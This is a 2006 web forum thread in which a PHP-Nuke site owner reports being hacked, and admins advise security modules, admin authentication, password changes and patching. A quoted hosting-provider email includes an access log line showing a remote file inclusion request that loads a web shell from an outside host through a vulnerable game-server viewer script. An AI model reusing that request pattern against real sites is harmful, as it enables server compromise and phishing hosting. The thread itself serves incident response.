Site was hacked

New Member Joined: Jun 30, 2006 Posts: 21

Any tips?

[EDIT: image removed]

Anyone had this happen?

Thanks, i don't think that the forums are up to date.

Posted: Thu Sep 07, 2006 7:26 pm

There are many threads that you can consult here. Without further information there is little we can do. Nuke version? Forums version? Running Sentinel or not and what version? Have you looked in the logs? Any "third party" modules that let people upload?

registered · Site Admin Joined: Jun 04, 2004 Posts: 6437

Install NukeSentinel, and put admin authentication on your admin.php file and modules/Forums/admin directory (search the forums here for specific instructions).

Check for any changed files, check your database. Change your control panel and nuke database passwords, which should be different.

I'll remove the picture from your post - there's no need to display offensive materials.

Posted: Thu Sep 07, 2006 7:49 pm

Nuke : Raven's RavenNuke76 v2.02.02 Distro

Forums: phpBB 2.0.20. ( Not sure how to update )

Sentinel yes, NukeSentinel(tm) 2.4.2pl5

Logs, oh yeah, lots of IP's

Nothing to upload as i know of!

Posted: Thu Sep 07, 2006 7:52 pm

What about admin authentication on admin.php and modules/Forums/admin?

Posted: Thu Sep 07, 2006 7:55 pm

I think it's broke...

My user login is gone... bleh

registered · Posted: Thu Sep 07, 2006 8:05 pm

If you can get into cpanel, here are the instructions to password protect your forum admin folder.

http://www.ravenphpscripts.com/postt9904.html

admin_auth can be found here (under Apache is compiled as CGI, what more can I do?)
and probably a few other places on the forums.

http://www.ravenphpscripts.com/nukesentinelmanual-menu_faq.html#faq10

Posted: Sat Sep 09, 2006 8:49 pm

upgrade your sentinel to the latest.... Smile

Posted: Mon Sep 11, 2006 10:58 pm

From: admin@1and1.com
To:
Subject: C54836102 - 1&1 Internet Compliance -- Account Warning - Hacked
Date: Mon, 11 Sep 2006 08:16:04 -0400
>Dear Swiss Chese,
>
>It has come to our attention that your web space has been hacked and
>used to host a phishing site at
>http://www.xtremeidiots.com/www.paypal.com.webscr.phpcmd=LogIn//:
>
>access.log.36.gz:86.126.57.95 - - [10/Sep/2006:10:29:41 -0400] "GET
>/SQuery/lib/armygame.php?libpath=http://www.freewebtown.com/k
>aizenngo5/hack/shell.php.txt? HTTP/1.1" 200 6255 www.xtremeidiots.com
>"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1
>; .NET CLR 1.1.4322)" "-"
>
>--
>
>The above was taken from your access logs. It shows that
>/SQuery/lib/armygame.php was used to perpetrate the hack.
>
>Please contact the developers for this script/application. You will
>likely need to install a version update and/or security patch to prevent
>further abuse.
>
>Also, reply to this email in acknowledgement of this issue. Failure to
>do so can result in your account being locked and possibly terminated.
>
>--
>Sincerely,
>Customer Compliance Operative
>1&1 Internet Inc.

I got hacked cause of a server viewier that i had.

Thank you for all the help... let this be a warning to all

SQUERY 4.0 game server viwer does have a big security holes!!!

Posted: Tue Sep 12, 2006 3:28 am

I know there is no way i can upload the 2 files that i found on my comp. but it looks like a method that they are using to crack the adminhttp.. if any admin would like to take a look at it please let me know and i will send the 2 php files over to them to help make this more secure.

Thanks

SwisS

registered · Posted: Tue Sep 12, 2006 6:35 am

swisschese, they got in through SQuery. Once "in" at the server level, HTTPAuth will not help you...

I would suggest signing up for the Secunia Advisory service at http://secunia.com/. SQuery was addressed Only registered users can see links on this board! Get registered or login!. An invaluable service for the webmaster. No guarantee they will cover every script, but just another resource.

Like I always say "your site is only as secure as its weakest link". It can be exhausting at times trying to keep up.